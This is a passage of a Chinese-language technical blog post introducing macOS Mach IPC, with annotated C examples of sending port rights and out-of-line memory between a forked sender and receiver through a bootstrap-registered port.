class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;servers/bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">    <span class="type">char</span> texts[<span class="number">0x20</span>];</span><br><span class="line">    <span class="type">int</span> integer;</span><br><span class="line">&#125; <span class="type">mach_msg_simple_send_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">mach_msg_simple_send_t</span> recv_content;</span><br><span class="line">    <span class="type">mach_msg_trailer_t</span> trailer;</span><br><span class="line">&#125; <span class="type">mach_msg_simple_receive_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">  <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">  <span class="type">mach_msg_size_t</span> msgh_descriptor_count;</span><br><span class="line">  <span class="type">mach_msg_port_descriptor_t</span> descriptor;</span><br><span class="line">&#125; <span class="type">mach_msg_complex_send_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">mach_msg_complex_send_t</span> recv_content;</span><br><span class="line">    <span class="type">mach_msg_trailer_t</span> trailer;</span><br><span class="line">&#125; <span class="type">mach_msg_complex_receive_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">sender</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 等待一小会，让 receiver 注册一下 bootstrap</span></span><br><span class="line">    <span class="built_in">usleep</span>(<span class="number">100</span>);</span><br><span class="line">    <span class="comment">// 从 bootstrap 中查询并获取一个 mach port</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] bootstrap_look_up() returned port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 构造待发送的信息</span></span><br><span class="line">    <span class="type">mach_msg_complex_send_t</span> send_msg;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 新建立一个 receiver 发送的 replyPort</span></span><br><span class="line">    <span class="type">mach_port_t</span> replyPort;</span><br><span class="line">    kr = <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;replyPort);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] mach_port_allocate() created port right name %d\n&quot;</span>, replyPort);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 给该 port 再增加一个发送权限</span></span><br><span class="line">    kr = <span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), replyPort, replyPort, MACH_MSG_TYPE_MAKE_SEND);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] mach_port_insert_right() inserted a send right\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 注意这里，要指定待发送的信息格式为 complex</span></span><br><span class="line">    send_msg.header.msgh_bits           = <span class="built_in">MACH_MSGH_BITS_SET</span>(MACH_MSG_TYPE_COPY_SEND, <span class="number">0</span>, <span class="number">0</span>, MACH_MSGH_BITS_COMPLEX);</span><br><span class="line">    send_msg.header.msgh_remote_port    = port;</span><br><span class="line">    send_msg.header.msgh_local_port     = MACH_PORT_NULL;</span><br><span class="line">    send_msg.header.msgh_size           = <span class="built_in">sizeof</span>(send_msg);</span><br><span class="line">    <span class="comment">// 指定只有一个描述符需要传递</span></span><br><span class="line">    send_msg.msgh_descriptor_count      = <span class="number">1</span>;</span><br><span class="line">    send_msg.descriptor.name            = replyPort;</span><br><span class="line">    send_msg.descriptor.disposition     = MACH_MSG_TYPE_PORT_SEND;</span><br><span class="line">    send_msg.descriptor.type            = MACH_MSG_PORT_DESCRIPTOR;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 将其发送</span></span><br><span class="line">    <span class="type">mach_msg_return_t</span> mr = <span class="built_in">mach_msg_send</span>(&amp;send_msg.header);</span><br><span class="line">    <span class="built_in">assert</span>(mr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Message is sent.\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 等待 message</span></span><br><span class="line">    <span class="type">mach_msg_simple_receive_t</span> recv_msg;</span><br><span class="line">    recv_msg.recv_content.header.msgh_size          = <span class="built_in">sizeof</span>(recv_msg);</span><br><span class="line">    recv_msg.recv_content.header.msgh_local_port    = replyPort;</span><br><span class="line">    kr = <span class="built_in">mach_msg_receive</span>(&amp;recv_msg.recv_content.header);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Got a Message\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Text: %s | number: %d\n&quot;</span>, recv_msg.recv_content.texts, recv_msg.recv_content.integer);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">receiver</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 创建一个带有接收权限的 mach port</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_allocate() created port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 给该 port 再增加一个发送权限</span></span><br><span class="line">    kr = <span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), port, port, MACH_MSG_TYPE_MAKE_SEND);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_insert_right() inserted a send right\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 将该端口的 send right 发送给 bootstrap，这样就可以被其他进程所查询</span></span><br><span class="line">    kr = <span class="built_in">bootstrap_register</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] bootstrap_register()&#x27;ed our port\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 等待 message</span></span><br><span class="line">    <span class="type">mach_msg_complex_receive_t</span> recv_msg;</span><br><span class="line">    recv_msg.recv_content.header.msgh_size          = <span class="built_in">sizeof</span>(recv_msg);</span><br><span class="line">    recv_msg.recv_content.header.msgh_local_port    = port;</span><br><span class="line">    kr = <span class="built_in">mach_msg_receive</span>(&amp;recv_msg.recv_content.header);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">assert</span>(recv_msg.recv_content.msgh_descriptor_count == <span class="number">1</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Got a Message\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] remote_port: %d\n&quot;</span>, recv_msg.recv_content.descriptor.name);</span><br><span class="line"></span><br><span class="line">    <span class="type">mach_msg_simple_send_t</span> send_msg;</span><br><span class="line">    <span class="built_in">strcpy</span>(send_msg.texts, <span class="string">&quot;Hello, I&#x27;m receiver.&quot;</span>);</span><br><span class="line">    send_msg.integer = <span class="number">2</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 注意这里的发送权限是 MACH_MSG_TYPE_MAKE_SEND_ONCE</span></span><br><span class="line">    send_msg.header.msgh_bits           = recv_msg.recv_content.descriptor.disposition;</span><br><span class="line">    send_msg.header.msgh_remote_port    = recv_msg.recv_content.descriptor.name;</span><br><span class="line">    send_msg.header.msgh_local_port     = MACH_PORT_NULL;</span><br><span class="line">    send_msg.header.msgh_size           = <span class="built_in">sizeof</span>(send_msg);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 将其发送</span></span><br><span class="line">    <span class="type">mach_msg_return_t</span> mr = <span class="built_in">mach_msg_send</span>(&amp;send_msg.header);</span><br><span class="line">    <span class="built_in">assert</span>(mr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Message is sent.\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> *argv[])</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    fork() ? <span class="built_in">sender</span>() : <span class="built_in">receiver</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>运行结果如下：</p><p><img src="/2021/12/mach_ipc_intro/image-20211229233517941.png" alt="image-20211229233517941"></p><h3 id="3-mach-OOL-通信">3. mach OOL  通信</h3><p>当某个进程需要传递<strong>大量</strong>数据给对端时，simple message 中的内联数据已经无法满足我们的需求了（因为将数据拷贝进内联数据的开销是相当大的）。因此，我们可以试着使用 mach complex message 中的 <strong>OOL 描述符</strong>来<strong>传递内存页</strong>。</p><h4 id="a-sender">a. sender</h4><p>首先，我们需要定义一下复杂 mach msg 的结构：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">    <span class="type">mach_msg_size_t</span> msgh_descriptor_count;</span><br><span class="line">    <span class="type">mach_msg_ool_descriptor_t</span> descriptor;</span><br><span class="line">&#125; <span class="type">mach_msg_complex_send_t</span>;</span><br></pre></td></tr></table></figure><p>注意到消息体中的描述符为 <code>mach_msg_ool_descriptor_t</code> 类型。该类型的结构体定义如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span>&#123;</span><br><span class="line">    <span class="type">void</span>*                         address;</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> !defined(__LP64__)</span></span><br><span class="line">    <span class="type">mach_msg_size_t</span>               size;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    <span class="type">boolean_t</span>                     deallocate: <span class="number">8</span>;</span><br><span class="line">    <span class="type">mach_msg_copy_options_t</span>       copy: <span class="number">8</span>;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span>                  pad1: <span class="number">8</span>;</span><br><span class="line">    <span class="type">mach_msg_descriptor_type_t</span>    type: <span class="number">8</span>;</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> defined(__LP64__)</span></span><br><span class="line">    <span class="type">mach_msg_size_t</span>               size;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">&#125; <span class="type">mach_msg_ool_descriptor_t</span>;</span><br></pre></td></tr></table></figure><p>其中，</p><ul><li><p>address 字段：存放待发送内存页面的基地址。</p></li><li><p>size 字段：待发送内存长度。</p></li><li><p>deallocate 字段：发送内存页面后，指定发送者<strong>是否需要隐式释放</strong>已发送的内存页面（例如自动调用 vm_deallocate），通常是 false。</p><p>这个字段可以将 <strong>内存复制</strong> 转换成 <strong>内存移动</strong>，即将发送方的内存页移动到接收方的进程中，内存处理效率更高。</p></li><li><p>copy 字段：指定内核<strong>以什么方式来复制</strong>发送过来的内存页面。共有两种方式：</p><ul><li>MACH_MSG_VIRTUAL_COPY：允许内核<strong>选择任何机制</strong>来传输数据。通常内核会先<strong>复制虚拟页面，共享物理页面</strong>，直到实际写入操作的发生再来进行数据复制操作，即写时复制。</li><li>MACH_MSG_PHYSICAL_COPY：内核会实际复制数据至<strong>新的物理页</strong>中。</li></ul></li><li><p>type 字段：指定当前 descriptor 的类型，这里必须为 <strong>MACH_MSG_OOL_DESCRIPTOR</strong></p></li></ul><p>接下来，sender 需要创建一个虚拟页面，并在该页面上写入一些数据：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> *buf = <span class="literal">NULL</span>;</span><br><span class="line"><span class="type">vm_size_t</span> len = vm_page_size;</span><br><span class="line"><span class="keyword">if</span> (<span class="built_in">vm_allocate</span>(<span class="built_in">mach_task_self</span>(), (<span class="type">vm_address_t</span> *)&amp;buf, len,</span><br><span class="line">                VM_PROT_READ | VM_PROT_WRITE) != KERN_SUCCESS)</span><br><span class="line">    <span class="built_in">abort</span>();</span><br><span class="line"><span class="built_in">strcpy</span>(buf, <span class="string">&quot;This is a buf message from sender.&quot;</span>);</span><br></pre></td></tr></table></figure><p>然后设置 Message，并将其发送：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 注意这里，要指定待发送的信息格式为 complex</span></span><br><span class="line">send_msg.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS_SET</span>(MACH_MSG_TYPE_COPY_SEND, <span class="number">0</span>, <span class="number">0</span>, MACH_MSGH_BITS_COMPLEX);</span><br><span class="line">send_msg.header.msgh_remote_port = port;</span><br><span class="line">send_msg.header.msgh_local_port = MACH_PORT_NULL;</span><br><span class="line">send_msg.header.msgh_size = <span class="built_in">sizeof</span>(send_msg);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 设置 OOL 描述符信息</span></span><br><span class="line">send_msg.msgh_descriptor_count = <span class="number">1</span>;</span><br><span class="line">send_msg.descriptor.address = buf;</span><br><span class="line">send_msg.descriptor.copy = MACH_MSG_VIRTUAL_COPY;</span><br><span class="line">send_msg.descriptor.deallocate = <span class="literal">false</span>;</span><br><span class="line">send_msg.descriptor.size = len;</span><br><span class="line">send_msg.descriptor.type = MACH_MSG_OOL_DESCRIPTOR;</span><br></pre></td></tr></table></figure><h4 id="b-receiver">b. receiver</h4><p>当接收方接收这个 mach message 时，在接收方的地址空间中，内核将<strong>新分配一块内存</strong>用于存放接收到的数据。</p><p>原先有一个选项用于<strong>指定内核</strong>将接收到的数据<strong>覆盖至</strong>接收方<strong>指定的内存地址</strong>处（MACH_MSG_OVERWRITE），但这个选项已经被废弃。</p><h4 id="c-代码示例">c. 代码示例</h4><p>以下是一个简单的代码示例，其中接收方使用 <code>MACH_MSG_ALLOCATE</code> 方式来接收数据：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;servers/bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">    <span class="type">mach_msg_size_t</span> msgh_descriptor_count;</span><br><span class="line">    <span class="type">mach_msg_ool_descriptor_t</span> descriptor;</span><br><span class="line">&#125; <span class="type">mach_msg_complex_send_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">mach_msg_complex_send_t</span> recv_content;</span><br><span class="line">    <span class="type">mach_msg_trailer_t</span> trailer;</span><br><span class="line">&#125; <span class="type">mach_msg_complex_receive_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">sender</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 等待一小会，让 receiver 注册一下 bootstrap</span></span><br><span class="line">    <span class="built_in">usleep</span>(<span class="number">1000</span>);</span><br><span class="line">    <span class="comment">// 从 bootstrap 中查询并获取一个 mach port</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">bootstrap_look_up</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, &amp;port) != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] bootstrap_look_up() returned port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 构造待发送的信息</span></span><br><span class="line">    <span class="type">mach_msg_complex_send_t</span> send_msg;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 注意这里，要指定待发送的信息格式为 complex</span></span><br><span class="line">    send_msg.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS_SET</span>(MACH_MSG_TYPE_COPY_SEND, <span class="number">0</span>, <span class="number">0</span>, MACH_MSGH_BITS_COMPLEX);</span><br><span class="line">    send_msg.header.msgh_remote_port = port;</span><br><span class="line">    send_msg.header.msgh_local_port = MACH_PORT_NULL;</span><br><span class="line">    send_msg.header.msgh_size = <span class="built_in">sizeof</span>(send_msg);</span><br><span class="line">    <span class="comment">// 指定待传递的地址</span></span><br><span class="line">    <span class="type">char</span> *buf = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="type">vm_size_t</span> len = vm_page_size;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">vm_allocate</span>(<span class="built_in">mach_task_self</span>(), (<span class="type">vm_address_t</span> *)&amp;buf, len,</span><br><span class="line">                    VM_PROT_READ | VM_PROT_WRITE) != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    <span class="built_in">strcpy</span>(buf, <span class="string">&quot;This is a buf message from sender.&quot;</span>);</span><br><span class="line"></span><br><span class="line">    send_msg.msgh_descriptor_count = <span class="number">1</span>;</span><br><span class="line">    send_msg.descriptor.address = buf;</span><br><span class="line">    send_msg.descriptor.copy = MACH_MSG_VIRTUAL_COPY;</span><br><span class="line">    send_msg.descriptor.deallocate = <span class="literal">false</span>;</span><br><span class="line">    send_msg.descriptor.size = len;</span><br><span class="line">    send_msg.descriptor.type = MACH_MSG_OOL_DESCRIPTOR;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 将其发送</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">mach_msg_send</span>(&amp;send_msg.header) != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Message is sent, buf address: %#p\n&quot;</span>, buf);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">receiver</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 创建一个带有接收权限的 mach port</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;port) != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_allocate() created port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 给该 port 再增加一个发送权限</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), port, port, MACH_MSG_TYPE_MAKE_SEND) != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_insert_right() inserted a send right\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 将该端口的 send right 发送给 bootstrap，这样就可以被其他进程所查询</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">bootstrap_register</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, port) != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] bootstrap_register()&#x27;ed our port\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 等待 message</span></span><br><span class="line">    <span class="type">mach_msg_complex_receive_t</span> recv_msg;</span><br><span class="line">    recv_msg.recv_content.header.msgh_size = <span class="built_in">sizeof</span>(recv_msg);</span><br><span class="line">    recv_msg.recv_content.header.msgh_local_port = port;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">mach_msg_receive</span>(&amp;recv_msg.recv_content.header) != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    <span class="built_in">assert</span>(recv_msg.recv_content.msgh_descriptor_count == <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> *buf = recv_msg.recv_content.descriptor.address;</span><br><span class="line">    <span class="type">size_t</span> len = recv_msg.recv_content.descriptor.size;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Got a Message\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] recv buf address: %#p, len: %d, content: %s\n&quot;</span>, buf, len, buf);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> *argv[])</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    fork() ? <span class="built_in">sender</span>() : <span class="built_in">receiver</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>测试结果：</p><p><img src="/2021/12/mach_ipc_intro/image-20211230091913991.png" alt="image-20211230091913991"></p><h3 id="4-Message-Trailer">4. Message Trailer</h3><p>接收方接收到的 Mach message 会包含一个 trailer 结构体。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td 